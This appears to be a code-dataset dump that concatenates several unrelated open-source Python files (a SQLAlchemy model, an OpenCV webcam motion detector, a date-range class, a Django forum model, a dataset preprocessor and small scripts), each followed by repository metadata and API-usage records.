"api_name": "time.sleep",
"line_number": 14,
... |
9036950970 | from datetime import datetime
from sqlalchemy import Column, String, Integer, Float, DateTime, select, delete
from sqlalchemy.exc import IntegrityError, NoResultFound
from sqlalchemy.ext.asyncio import AsyncSession
from app.services.database import Base
class TokenInfo(Base):
    """Snapshot of a token's market rank and price at a point in time."""

    __tablename__ = "TokenInfo"

    # Composite primary key: one row per (timestamp, symbol) pair.
    created_at = Column(DateTime, primary_key=True)
    symbol = Column(String, primary_key=True)
    rank = Column(Integer, nullable=False)
    price = Column(Float, nullable=True)

    @classmethod
    async def create(cls, db: AsyncSession, **kwargs):
        """Insert a new TokenInfo row, commit, and return the refreshed instance."""
        transaction = cls(**kwargs)
        db.add(transaction)
        await db.commit()
        await db.refresh(transaction)
        return transaction

    @classmethod
    async def delete_timestamp(cls, db: AsyncSession, created_at: datetime):
        """Delete every row recorded at *created_at* and commit.

        NOTE(review): this returns the DELETE statement object itself -- the
        result of db.execute() (and thus the RETURNING rows) is discarded.
        Verify that callers do not expect the deleted rows back.
        """
        transaction = delete(cls).where(
            cls.created_at==created_at
        ).returning(cls.symbol, cls.created_at)
        await db.execute(transaction)
        await db.commit()
        return transaction

    @classmethod
    async def get_tokens_by_date(cls, db: AsyncSession, dt: datetime):
        """Return all TokenInfo rows whose created_at equals *dt*."""
        return (await db.execute(
            select(cls).filter_by(created_at=dt)
        )).scalars().all()
| treybrooks/TopCryptosAPI | api/app/models.py | models.py | py | 1,243 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "app.services.database.Base",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.DateTime",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "s... |
1522352511 | import cv2, time, pandas
from datetime import datetime
# Motion-detector state
firstFrame = None          # reference frame that later frames are diffed against
statusList = [None, None]  # last two motion statuses (0 = idle, 1 = motion)
times = []                 # flat list of (start, end, exit-area) triples
contourCount = []          # contour area per processed frame (0 while idle)
frameCount = []            # x-axis indices for plotting avgContour
avgContour = []            # chunk-averaged (smoothed) contour areas
contCStart = 0             # set to 1 once the first movement has been seen
video = cv2.VideoCapture(0, cv2.CAP_DSHOW)
df = pandas.DataFrame(columns=["Start","End"])
while True:
    check, frame = video.read()
    status = 0
    # Convert to grayscale and blur to suppress sensor noise before diffing.
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    gray = cv2.GaussianBlur(gray, (21,21), 0)
    # Capture the first frame as the static reference for later comparisons.
    if firstFrame is None:
        firstFrame = gray
        continue
    delta = cv2.absdiff(firstFrame, gray)
    # Threshold the difference image to black/white, dilate to fill gaps,
    # then extract the contours of the moving regions.
    threshFrame = cv2.threshold(delta, 30, 255, cv2.THRESH_BINARY)[1]
    threshFrame = cv2.dilate(threshFrame, None, iterations=2)
    (cnts,_) = cv2.findContours(threshFrame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    # For each contour with area >= 5000, draw a rectangle and record it.
    for contour in cnts:
        if cv2.contourArea(contour) < 5000:
            if contCStart == 1:  # after first detection, log idle frames as 0
                contourCount.append(0)
            continue
        status = 1
        contCStart = 1
        contourCount.append(cv2.contourArea(contour))
        (x, y, w, h) = cv2.boundingRect(contour)
        cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255,0), 3)
    statusList.append(status)
    statusList = statusList[-2:]  # only keep the two most recent statuses
    # Record when something enters/exits the frame, plus its size on exit.
    # NOTE(review): 'contour' below is whatever the for-loop left bound last;
    # it raises NameError if no contour was ever produced and may not be the
    # contour that triggered the status change.  Confirm intended.
    if statusList[-1] == 1 and statusList[-2] == 0:
        times.append(datetime.now())
    if statusList[-1] == 0 and statusList[-2] == 1:
        times.append(datetime.now())
        times.append(cv2.contourArea(contour))
    # Show the grayscale, delta, thresholded and annotated color frames.
    cv2.imshow("Capturing", gray)
    cv2.imshow("Delta", delta)
    cv2.imshow("Threshold", threshFrame)
    cv2.imshow("Color Frame", frame)
    key = cv2.waitKey(100)
    # 'q' quits; if motion is still in progress, close the open record first.
    if key == ord('q'):
        if status == 1:
            times.append(datetime.now())
            times.append(cv2.contourArea(contour))
        break
################# end while loop ###############
# Add the recorded (start, end, exit-area) triples to the data frame.
# FIX: DataFrame.append() was deprecated in pandas 1.4 and removed in 2.0;
# build the rows first and concatenate once instead (also avoids the
# quadratic cost of appending row by row).
rows = [{"Start": times[i], "End": times[i + 1], "ExitArea": times[i + 2]}
        for i in range(0, len(times), 3)]
if rows:
    df = pandas.concat([df, pandas.DataFrame(rows)], ignore_index=True)
df.to_csv("Times.csv")
z = 0
x = 0
y = 0
count = 1
# Average the contour areas in chunks of 10 frames to smooth the graph.
# NOTE(review): count starts at 1, so each chunk divides by samples+1, and z
# gets one extra increment per outer pass -- both look accidental; confirm
# against the intended smoothing before changing, since they only scale the
# plot.
while x < len(contourCount):
    while z < x+10:
        if z < len(contourCount):
            y = contourCount[z] + y
            z = z + 1
            count = count + 1
        else:
            z = x + 50  # past the end of the data: force the inner loop to stop
    # FIX: the original used '^' (bitwise XOR) where the comment says the
    # average should be squared -- use ** to actually square it.
    avgContour.append(float(int(y/count) ** 2))  # squared to accentuate changes
    #avgContour.append((y/count))
    y = 0
    x = x + 10
    z = z + 1
    count = 1
i = 0
# Chunk indices for the x-axis of the plot.
while i < len(avgContour):
    frameCount.append(i)
    i = i + 1
video.release()
cv2.destroyAllWindows()
| Caseyar95/MotionDetectingWebcam | VideoCapture2.py | VideoCapture2.py | py | 3,169 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.CAP_DSHOW",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
... |
5145048204 | from .range_borders import Date, FromInfinity, ToInfinity
from datetime import timedelta
class DateRange:
    """
    This class implements date ranges that support open borders,
    so it is possible to create date ranges that contain all dates up to
    a specific date or all dates from a specific date on. Strict ranges with
    specific dates as borders are supported as well.
    The implementation does not support any kind of daytime measurement.
    """

    # DateRange supports all formats that are supported by the datetime module
    # '%Y-%m-%d' is the predefined format
    DATE_FORMAT: str = '%Y-%m-%d'

    #######################################################################################
    # the following methods can be called on every DateRange instance (infinite and finite)

    def __init__(self, date_from: str or None, date_to: str or None):
        """
        Creates a new Daterange. date_to must be greater or equal to date_form
        :param date_from: None value represents an open border
        :param date_to: None value represents an open border
        """
        if date_from is None:
            self._date_from = FromInfinity()
        else:
            self._date_from = Date(date_from, DateRange.DATE_FORMAT)
        if date_to is None:
            self._date_to = ToInfinity()
        else:
            self._date_to = Date(date_to, DateRange.DATE_FORMAT)

        # is set in the first call of the __len__ function
        self._length = None
        self._is_infinite = date_from is None or date_to is None

        if not self._is_infinite:
            # NOTE(review): this compares the raw strings, which matches
            # chronological order only for lexicographically sortable formats
            # such as the default '%Y-%m-%d' -- verify if DATE_FORMAT changes.
            if date_to < date_from:
                raise ValueError(f"date_to must be equal or greater than date_form. "
                                 f"{self.__repr__()}")

    def __repr__(self):
        return f"DateRange({self._date_from.to_string(DateRange.DATE_FORMAT)}, " \
               f"{self._date_to.to_string(DateRange.DATE_FORMAT)})"

    def __contains__(self, item: str):
        """Return True if the date string *item* lies within the range borders."""
        date = Date(item, DateRange.DATE_FORMAT)
        return self._date_from <= date <= self._date_to

    def intersects(self, date_from: str or None, date_to: str or None) -> bool:
        # returns true if at least one date is contained in both ranges
        date_range = DateRange(date_from=date_from, date_to=date_to)
        return not (self._date_to < date_range._date_from or date_range._date_to < self._date_from)

    def is_infinite(self) -> bool:
        return self._is_infinite

    ##########################################################################
    # the following methods raise exceptions if called on infinite DateRanges

    def __iter__(self):
        # NOTE(review): iteration state is stored on the instance (_current),
        # so nested or concurrent iteration over the same object interferes.
        if self._is_infinite:
            raise ValueError(f"infinite date ranges are not iterable. date_range: {self.__repr__()}")
        else:
            self._current = self._date_from.date
            return self

    def __next__(self):
        # Yield dates one day at a time, formatted with DATE_FORMAT.
        if self._current > self._date_to.date:
            raise StopIteration
        else:
            ret = self._current.strftime(DateRange.DATE_FORMAT)
            self._current += timedelta(1)
            return ret

    def __len__(self):
        if self._is_infinite:
            raise ValueError(f"length infinite date ranges is not defined. date_range: {self.__repr__()}")
        # length has to be calculated and set only once because the
        # length of a date range can not change
        # !!!---if you want to implement the borders of date ranges to be changeable
        # this method must be reimplemented---!!!
        if self._length is None:
            counter = 0
            # __iter__ can safely be used because __len__ requires a finite date range as well
            for _ in self.__iter__():
                counter += 1
            self._length = counter
        return self._length
| tlie03/OpenDateRange | src/openDateRange/date_range.py | date_range.py | py | 3,833 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "range_borders.FromInfinity",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "range_borders.Date",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "range_borders.ToInfinity",
"line_number": 32,
"usage_type": "call"
},
{
"api_name":... |
6790838721 | from django.db import models
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericRelation
from model_utils.models import TimeStampedModel
from files.mixins import UploadedFileMixin
from permissions.models import PermissionManagerMixin
from utils.models import CreatedByMixin
from utils.models.slug_field import AutoSlugCustomManagerField
from utils.descriptors import ChoicesDescriptorMixin
from ..managers.post import PostManager, AllPostManager
from ..conf import settings
from .mails.mails import PostEmailMixin
from .mixins import PostStatsMixin, PostPermissionsMixin, PostMetricMixin
class Post(
        PostPermissionsMixin,
        PostMetricMixin,
        PostStatsMixin,
        UploadedFileMixin,
        PermissionManagerMixin,
        CreatedByMixin,
        ChoicesDescriptorMixin,
        PostEmailMixin,
        TimeStampedModel):
    """Forum post attached via a generic FK to a container (circle, project
    team or Q&A session), with status logging, tagging and reply handling."""

    # Define here because of AutoSlugField
    objects = PostManager()
    all_objects = AllPostManager()

    title = models.CharField(max_length=255)
    description = models.TextField()
    # Generic relation to the post's container object.
    content_type = models.ForeignKey(
        ContentType,
        on_delete=models.CASCADE,
        null=True,
    )
    object_id = models.PositiveIntegerField(null=True)
    content_object = GenericForeignKey('content_type', 'object_id')
    slug = AutoSlugCustomManagerField(
        populate_from='title',
        unique=True,
        null=True,
        blank=False,
    )
    tags = models.ManyToManyField('keywords.Keyword')
    _type = models.CharField(
        max_length=1,
        choices=settings.FORUM_POST_CH_TYPE)
    status = models.CharField(
        max_length=1,
        choices=settings.FORUM_CH_POST_STATUS,
        default=settings.FORUM_CH_POST_STATUS_DEFAULT)

    # ChoicesDescriptorMixin derives boolean accessors (e.g. is_circle,
    # is_project, is_q_a_session used below) from these fields/choices.
    CHOICES_DESCRIPTOR_FIELDS = [
        '_type',
        'status',
    ]
    CHOICES_DESCRIPTOR_FIELDS_CHOICES = [
        settings.FORUM_POST_CH_TYPE,
        settings.FORUM_CH_POST_STATUS,
    ]

    logs = GenericRelation('PostAnswerStatus')
    files = GenericRelation('files.UploadedFile')

    # NOTE(review): objects/all_objects are assigned again here, repeating
    # the assignments at the top of the class -- confirm both are needed.
    objects = PostManager()
    all_objects = AllPostManager()
    slug_manager = AllPostManager()

    class Meta:
        verbose_name = 'Post'
        verbose_name_plural = 'Posts'
        ordering = ['-modified']
        base_manager_name = 'objects'
        permissions = settings.FORUM_PERMS_POST_ALL_PERMISSIONS

    def __str__(self):
        return self.title

    @property
    def category_name(self):
        """Human-readable category label derived from the post's container."""
        category_name = ''
        if self.is_q_a_session:
            category_name = '{} - {} - {}'.format(
                self.get__type_display(),
                self.content_object.team.project,
                self.content_object.session.name,
            )
        elif self.content_object:
            category_name = self.content_object.name
        else:
            category_name = self.get__type_display()
        return category_name

    @property
    def circle(self):
        """The circle container, or None when this is not a circle post."""
        if self.is_circle:
            return self.content_object
        return None

    @property
    def qa_session(self):
        """The Q&A session, or None when this is not a Q&A-session post."""
        if self.is_q_a_session:
            return self.content_object.session
        return None

    @property
    def team(self):
        """The related team (directly or via the Q&A session), or None."""
        if self.is_project:
            return self.content_object
        elif self.is_q_a_session:
            return self.content_object.team
        return None

    @property
    def project(self):
        """The project owning the related team, or None."""
        if self.team:
            return self.team.project
        return None

    @property
    def created_by_role(self):
        return self.created_by.user_title

    @property
    def url(self):
        """Frontend URL for this post; '' when the type has no detail page."""
        if self.is_circle or self.is_project or self.is_announcement:
            if self.is_circle:
                circle = self.circle.slug
            elif self.is_project:
                circle = 'participant-questions'
            else:
                circle = 'announcements'
            return settings.FRONTEND_POST_DETAIL_PAGE.format(
                slug=self.slug,
                circle=circle)
        elif self.is_q_a_session:
            return settings.FRONTEND_JOBS_SWARM_SESSION_QUESTION_PAGE.format(
                **{
                    'pk_qa_session': self.content_object.session.pk,
                    'pk': self.pk
                })
        else:
            return ''

    @property
    def url_project(self):
        """Project-scoped frontend URL for this post; '' when not applicable."""
        kwargs = {}
        if self.project is not None:
            kwargs = {
                'project_id': self.project.pk,
                'team_id': self.team.pk,
                'pk': self.pk,
            }
            if self.is_project:
                kwargs['section'] = 'ask-ecosystem'
            elif self.is_q_a_session:
                kwargs['section'] = 'swarm-session'
        else:
            kwargs = None
        if kwargs is not None:
            return settings.FRONTEND_PROJECT_QUESTION_PAGE.format(**kwargs)
        return ''

    def set_status(self, user_from, new_status):
        """Log the current status (attributed to user_from), then switch."""
        self.logs.create(
            user=user_from, status=self.status)
        self.status = new_status
        self.save(update_fields=['modified', 'status'])

    def mark_as_removed(self, user_from):
        """Permission-checked soft removal: set status and fire the action."""
        self.can_update_or_remove(user_from)
        self.set_status(user_from, settings.FORUM_CH_REMOVED)
        self.action_removed(user_from)

    def reply(self, user_from, comment, timestamp=None, **kwargs):
        """Create an answer to this post (permission-checked).

        Optionally back-dates the answer/post to *timestamp* and sends a
        notification email unless kwargs['email_notification'] is False.
        Returns the created answer.
        """
        self.can_reply(user_from)
        answer = self.answers.create(
            comment=comment,
            created_by=user_from,
            reply_to=kwargs.get('reply_to'),
        )
        kwargs['target_object'] = answer
        if timestamp:
            # Back-date via queryset update() so save() hooks don't
            # overwrite the timestamps.
            self.answers.filter(pk=answer.pk).update(
                created=timestamp,
                modified=timestamp)
            Post.objects.filter(pk=self.pk).update(modified=timestamp)
        else:
            self.save(update_fields=['modified'])
        if kwargs.get('email_notification', True):
            self.send_email_reply(answer)
        answer.see(user_from)
        super().reply(user_from, comment, timestamp, **kwargs)
        return answer
| tomasgarzon/exo-services | service-exo-core/forum/models/post.py | post.py | py | 6,189 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mixins.PostPermissionsMixin",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mixins.PostMetricMixin",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "mixins.PostStatsMixin",
"line_number": 24,
"usage_type": "name"
},
{
"api_name... |
11538242087 | from PIL import Image, ImageDraw
cella = 75
# Draw a filled axis-aligned rectangle from (x1, y1) to (x2, y2), in pixels,
# on the module-level drawing surface `dib`.
def rect(x1, y1, x2, y2, col):
    dib.polygon([(x1, y1), (x2, y1), (x2, y2), (x1, y2)], col)
# Draw a filled circle centered inside board cell (x, y); `cella` is the
# cell size in pixels and `dib` the module-level drawing surface.
def cercle(x, y, col):
    dib.ellipse([cella*x + 25, cella*y + 25, cella*x + 49, cella*y + 49], col)
# Board dimensions: c columns, f rows.
c = int(input())
f = int(input())
img = Image.new('RGB', (cella*c, cella*f), 'Beige')
dib = ImageDraw.Draw(img)
# mat[y][x] == 1 marks a walkable cell; start and goal are always walkable.
mat = []
for j in range(f):
    fila = [0]*c
    mat += [fila]
mat[0][0] = 1
cercle(0, 0, 'Black')
mat[f-1][c-1] = 1
cercle(c - 1, f - 1, 'Black')
# Read n additional walkable cells (given with 1-based coordinates).
n = int(input())
for r in range(n):
    x = int(input()) - 1
    y = int(input()) - 1
    mat[y][x] = 1
    cercle(x, y, 'Black')
# First pass: walk greedily (prefer right, then down) to decide whether the
# goal is reachable -- 'Green' if (c-1, f-1) is reached, 'Red' otherwise.
x = 0
y = 0
color = ''
while color == '':
    if x == c - 1 and y == f - 1:
        color = 'Green'
    elif x < c - 1 and mat[y][x+1]:
        x += 1
    elif y < f - 1 and mat[y+1][x]:
        y += 1
    else:
        color = 'Red'
# Second pass: repeat the same walk, painting circles and the connecting
# segments in the color decided above.
x = 0
y = 0
fi = False
while not fi:
    cercle(x, y, color)
    if x == c - 1 and y == f - 1:
        fi = True
    elif x < c - 1 and mat[y][x+1]:
        rect(cella*x + cella//2, cella*y + 35, cella*x + 3*cella//2, cella*y + 39, color)
        x += 1
    elif y < f - 1 and mat[y+1][x]:
        rect(cella*x + 35, cella*y + cella//2, cella*x + 39, cella*y + 3*cella//2, color)
        y += 1
    else:
        fi = True
img.save("output.png") | oicatalana/solucions_oicat_2019 | concurs_classificatori2/pb6.py | pb6.py | py | 1,255 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "PIL.Image.new",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "PIL.ImageDraw.Draw",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PIL.ImageDraw",
"line_... |
18180968433 | # Student Virtual Assistant
# Libraries for accessing Google Scholar and scheduling reminders
import webbrowser
import schedule
import time
# Function to access Google Scholar
def search_scholar(query):
    """Open Google Scholar in the default browser for *query*.

    FIX: the query is now percent-encoded, so spaces and special characters
    survive being embedded in the URL query string.
    """
    from urllib.parse import quote_plus
    webbrowser.open(f"https://scholar.google.com/scholar?q={quote_plus(query)}")
# Function to input schedule
def input_schedule():
    """Interactively collect class_name -> class_time entries until 'done'.

    FIX: the local dict is no longer named ``schedule``, which shadowed the
    imported ``schedule`` module (the same shadowing crashes run_assistant).
    """
    timetable = {}
    while True:
        class_name = input("Enter class name (or type 'done' if finished): ")
        if class_name == "done":
            break
        class_time = input("Enter class time (e.g. 9:00 AM): ")
        timetable[class_name] = class_time
    return timetable
# Function to input assignments
def input_assignments():
    """Collect assignment descriptions until the user types 'done'."""
    entries = []
    while (entry := input("Enter assignment (or type 'done' if finished): ")) != "done":
        entries.append(entry)
    return entries
# Function to remind student to hydrate (used as a scheduled job below)
def remind_hydrate():
    """Print a hydration reminder."""
    print("Don't forget to drink water and stay hydrated!")
# Main function to run the virtual assistant
def run_assistant():
    """Drive the assistant: collect the schedule and assignments, run a
    Google Scholar search, then loop forever firing hourly hydration
    reminders.

    FIX: the local variable holding the user's timetable was named
    ``schedule``, shadowing the imported ``schedule`` module -- the later
    ``schedule.every(1).hours`` call therefore raised AttributeError on a
    dict.  The local is renamed so the scheduling module stays reachable.
    """
    print("Welcome to the Student Virtual Assistant")

    # Input schedule
    print("Please enter your schedule:")
    class_schedule = input_schedule()
    print(f"Your schedule: {class_schedule}")

    # Input assignments
    print("Please enter your assignments:")
    assignments = input_assignments()
    print(f"Your assignments: {assignments}")

    # Access Google Scholar
    query = input("What would you like to search on Google Scholar? ")
    search_scholar(query)

    # Schedule reminders to hydrate
    schedule.every(1).hours.do(remind_hydrate)

    # Start reminders (runs until interrupted)
    while True:
        schedule.run_pending()
        time.sleep(1)
# Run the virtual assistant
if __name__ == "__main__":
run_assistant()
| macnya/Student_virtual_assistant | Student_VA.py | Student_VA.py | py | 1,790 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "webbrowser.open",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "schedule.every",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "schedule.run_pending",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "time.sleep",
... |
37241864515 | #!/usr/bin/python3
"""
Run this with:
python3 -m http.server --cgi
"""
import cgitb
# Render CGI tracebacks as plain text instead of HTML for easier debugging.
cgitb.enable(format="text")

from helper import get_input, json

# user_input = get_input()

# Example payload used while the real input handling above is commented out.
test_data = {
    "firstName": "John",
    "lastName": "Smith",
    "age": 27
}

# Will give you JSON output in the console
print(json.dumps(test_data))
'''
if user_input:
print("User-input", user_input)
else:
print(test_data)
''' | Alexico1969/Points-Sandbox | cgi-bin/api.py | api.py | py | 415 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cgitb.enable",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "helper.json.dumps",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "helper.json",
"line_number": 23,
"usage_type": "name"
}
] |
72084597543 | from setuptools import setup, find_packages
# Read the runtime dependencies, skipping any git-pinned requirements.
with open("requirements.txt") as req_file:
    requirements = [line.strip() for line in req_file if "git+" not in line]

setup(
    name='chord-cleaning',
    description='creating a set of standardized chords from data',
    install_requires=requirements,
    packages=find_packages(),
)
| emilycardwell/chord-cleaning | setup.py | setup.py | py | 341 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 10,
"usage_type": "call"
}
] |
8265346084 | import csv
import os
import sys
from typing import List
from termcolor import colored
from tqdm import tqdm
from .binaryds import BinaryDs
MINIMUM_FEATURES: int = 32
csv.field_size_limit(sys.maxsize)
def run_preprocess(input_dir: List[str], category: int, output_dir: str,
                   openc: bool, features: int, balanced: bool,
                   seed: int, incomplete: bool) -> None:
    """
    Performs the preprocessing by adding a category and writes (or updates) the
    binary file containing the dataset on disk
    :param input_dir The folder where the examples for a single category can be
    found
    :param category: The id of the category that will be written
    :param output_dir: Path to the folder where the train.bin and test.bin
    can be found (or will be created).
    :param openc: True if this method has a function opcode encoding
    :param features: How many features (i.e. The number of bytes for each
    example)
    :param balanced: True if the produced dataset should have the same
    amount of training/testing/validate samples for each category
    :param seed: The seed that will be used for shuffling
    :param incomplete: True if the dataset won't be splitted, deduplicated
    or shuffled
    :raises FileNotFoundError: if output_dir does not exist
    """
    # Explicit validation instead of `assert`: asserts are stripped when the
    # interpreter runs with -O, so input checks must not rely on them.
    if not os.path.exists(output_dir):
        raise FileNotFoundError(f"Output directory not found: {output_dir}")
    # All previously-written shards are merged back into `train` first; the
    # split steps below redistribute them again.
    train, validate, test = __load_all_into_train(output_dir, features, openc)
    print("Reading and adding new files... ", flush=True)
    files = gather_files(input_dir, openc)
    read_and_add(train, files, category)
    if incomplete:
        # Incomplete mode: leave the merged train set untouched and report
        # every post-processing stage as skipped.
        print("Deduplicating... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Shuffling... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Balancing... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Splitting... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
    else:
        print("Deduplicating... ", end="", flush=True)
        train.deduplicate()
        print(colored("OK", "green", attrs=['bold']), flush=True)
        print("Shuffling... ", end="", flush=True)
        train.shuffle(seed)
        print(colored("OK", "green", attrs=['bold']), flush=True)
        print("Balancing... ", end="", flush=True)
        if balanced:
            train.balance()
            print(colored("OK", "green", attrs=['bold']), flush=True)
        else:
            print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Splitting... ", end="", flush=True)
        # Carve `validate` out of train, then `test` out of validate.
        train.split(validate, 0.5)
        validate.split(test, 0.5)
        print(colored("OK", "green", attrs=['bold']), flush=True)
    print("Finalizing... ", end="", flush=True)
    train.close()
    validate.close()
    test.close()
    print(colored("OK", "green", attrs=['bold']), flush=True)
def __load_all_into_train(output_dir: str, features: int,
                          openc: bool) -> (BinaryDs, BinaryDs, BinaryDs):
    """Open the train/validate/test shards and fold everything into train.

    Returns the three (still open) BinaryDs handles; validate and test are
    emptied into train so a later split step can redistribute the examples.
    """
    print("Loading old dataset... ", end="", flush=True)

    def _open_shard(filename: str) -> BinaryDs:
        # All three shards share the same feature width and encoding flag.
        return BinaryDs(os.path.join(output_dir, filename),
                        features=features, encoded=openc).open()

    train = _open_shard("train.bin")
    test = _open_shard("test.bin")
    validate = _open_shard("validate.bin")
    train.merge(test)
    train.merge(validate)
    print(colored("OK", "green", attrs=['bold']), flush=True)
    return train, validate, test
def read_and_add(dataset: BinaryDs, files: List[str], category: int) -> None:
    """
    Reads the raw files add them directly to the dataset as examples.
    Functions/data with more bytes than the number of features will be split
    into several chunks of features length.
    If opcode encoding was chosen, chunks with less than MINIMUM_FEATURES bytes
    (default 32) will be discarded, otherwise chunks with an amount of bytes
    different than the number of features will be discarded.
    :param files: List of paths to every file that will be processed.
    :param dataset: dataset where the examples will be added.
    :param category: The category for the current examples.
    """
    buffer = []
    for cur_file in tqdm(files, ncols=60):
        data = list()
        features = dataset.get_features()
        openc = dataset.is_encoded()
        if openc:
            # Opcode mode: each CSV row holds a hex string in the "opcodes"
            # column that is decoded back into raw bytes.
            with open(cur_file, 'r') as f:
                reader = csv.DictReader(f, delimiter=",", quotechar='"',
                                        quoting=csv.QUOTE_NONNUMERIC)
                for row in reader:
                    raw_data = row["opcodes"]
                    encoded_data = bytes.fromhex(raw_data)
                    data.append(encoded_data)
        else:
            # Raw mode: the whole binary file is a single example source.
            with open(cur_file, 'rb') as f:
                data.append(f.read())
        # split in chunks of "features" length
        chunked = []
        for el in data:
            chunks = [el[j:j + features] for j in range(0, len(el), features)]
            chunked.extend(chunks)
        if openc:
            # prepad remaining elements and drop ones that are too short
            # (bytes(missing) prepends zero bytes up to the feature width).
            padded = []
            for element in chunked:
                cur_len = len(element)
                if cur_len >= MINIMUM_FEATURES:
                    missing = features - cur_len
                    padded.append(bytes(missing) + element)
            chunked = padded
        else:
            # drop elements different from feature size
            chunked = list(filter(lambda l: len(l) == features, chunked))
        # append category and add to dataset
        chunked = [(category, x) for x in chunked]
        buffer.extend(chunked)
        # Flush roughly every 4 MiB (4194304 bytes) of buffered examples to
        # bound memory use while still batching disk writes.
        if len(buffer) > int(4194304 / (features + 1)):
            # write only when a certain size is reached
            dataset.write(buffer)
            buffer = []
    if len(buffer) > 0:
        # write remaining
        dataset.write(buffer)
def gather_files(paths: List[str], openc: bool) -> List[str]:
    """
    Finds all files contained in a directory (recursively) and filters them
    based on their extensions.
    :param paths: Paths to the folder containing the files or to a single file
    :param openc: True if opcode based encoding is requested (will parse .csv
    files, .bin otherwise)
    :return: A list of paths to every file contained in the folder with .csv
    or .bin extension (based on the function parameter)
    :raises FileNotFoundError: if a given path yields no file with the
    expected extension
    """
    ext = ".csv" if openc else ".bin"
    files = []
    for path in paths:
        if os.path.isdir(path):
            cur_files = []
            # os.walk yields (root, dirs, files): join each file with its OWN
            # root, not with the top-level `path` — the original joined with
            # `path` and produced wrong paths for files in sub-directories.
            for root, _, found in os.walk(path):
                for cur_file in found:
                    cur_files.append(os.path.join(root, cur_file))
        else:
            cur_files = [path]
        cur_files = [f for f in cur_files if os.path.splitext(f)[1] == ext]
        if len(cur_files) == 0:
            # Both message halves are f-strings: the original left the second
            # literal without the `f` prefix, printing "{ext}" verbatim.
            raise FileNotFoundError(f"No files with the correct extension, "
                                    f"{ext} were found in the given folder")
        else:
            files.extend(cur_files)
    return files
| inoueke-n/optimization-detector | src/preprocess.py | preprocess.py | py | 7,391 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "csv.field_size_limit",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.maxsize",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "os.path.exists",
... |
41133433788 | from cryptography.fernet import Fernet
import os
from pathlib import Path
# Directory holding the application settings file; created on first run.
default_path = Path("/home/Diode/Dicot/VisionIOT/main")
if not os.path.exists(default_path):
    os.makedirs(default_path)
filen = os.path.join(default_path, "app.dat")
# Truncate (or create) the settings file. Because of this, `content` read
# back below is always empty; kept to preserve the original flow.
open(filen, 'w').close()
with open(filen) as forread:
    content = forread.read()
k_ey = Fernet.generate_key()
with open(filen, 'w') as appsetting:
    # generate_key() returns url-safe base64 *bytes*; decode them so the file
    # stores the raw key text. The original wrote str(bytes), which embeds a
    # Python "b'...'" repr and makes the stored key unusable when read back.
    appsetting.write(content + "\nsecretKey: " + k_ey.decode())
{
"api_name": "pathlib.Path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number"... |
22209534047 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import logging
from subprocess import Popen
from os import devnull
try:
from functools import reduce
except:
pass
def get_time_info(state):
    """Split a "name#begin-end" state string into its timing parts.

    Returns [name, begin, end, length] with the three numbers as floats;
    states without a "#" timing suffix get 0.0 for all three values.
    """
    if "#" not in state:
        return [state, 0.0, 0.0, 0.0]
    name, span = state.split("#")
    start_text, stop_text = span.split("-")
    start = float(start_text)
    stop = float(stop_text)
    return [name, start, stop, stop - start]
def stripmac(state, mac):
    """Strip the MAC address (and a 'playlist' keyword, if present) from a
    telnet status line.

    If the MAC is not part of the line an error is logged and the line is
    returned unchanged.
    """
    if mac not in state:
        logging.error("MAC address not in telnet comm: %s", state)
        return state
    cleaned = state.replace(mac, "").strip()
